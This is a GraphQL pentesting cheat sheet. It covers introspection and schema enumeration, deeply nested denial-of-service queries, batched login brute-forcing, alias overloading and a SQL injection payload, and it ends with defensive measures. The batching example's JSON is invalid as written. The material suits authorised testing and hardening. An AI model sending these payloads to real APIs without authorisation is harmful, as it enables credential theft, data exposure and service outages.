GraphQL Pentesting
GraphQL APIs offer flexibility but introduce unique attack vectors like introspection abuse, nested query DoS, and batching attacks.
Introspection & Enumeration
Introspection allows you to query the API for its schema.
Check Introspection
Send a query to check if introspection is enabled.
POST /graphql
Content-Type: application/json
{
"query": "{ __schema { types { name } } }"
}Get Full Schema
Use tools like gq or InQL to retrieve the full schema.
gq https://api.target.com/graphql --introspectManual Enumeration
If you can't get the full schema, try listing types, queries, and mutations manually.
List all types:
{
__schema {
types {
name
kind
}
}
}List all queries:
{
__schema {
queryType {
fields {
name
description
}
}
}
}List all mutations:
{
__schema {
mutationType {
fields {
name
description
}
}
}
}GraphQL Specific Attacks
Nested Query DoS
Send deeply nested queries to exhaust server resources (Circular Queries).
query {
user(id: 1) {
posts {
comments {
author {
posts {
comments {
author {
# ... repeat ...
}
}
}
}
}
}
}
}Batching Attacks
Send multiple queries in a single request to bypass rate limits or brute force credentials.
[
{ "query": "query { login(u: "admin", p: "123456") { token } }" },
{ "query": "query { login(u: "admin", p: "password") { token } }" },
{ "query": "query { login(u: "admin", p: "12345678") { token } }" }
]Alias Overloading
Request the same field multiple times with aliases to cause resource exhaustion.
query {
user1: user(id: 1) { email }
user2: user(id: 2) { email }
user3: user(id: 3) { email }
}Injection
SQL or NoSQL injection can occur within GraphQL arguments.
query {
user(id: "1' OR 1=1--") {
username
}
}Remediation
Defense Strategies
- Disable Introspection in production environments.
- Implement Query Depth Limiting (e.g., max depth 5).
- Implement Query Complexity Analysis (cost-based limiting).
- Disable or limit batching functionality.
- Validate all arguments and inputs (treat them as untrusted).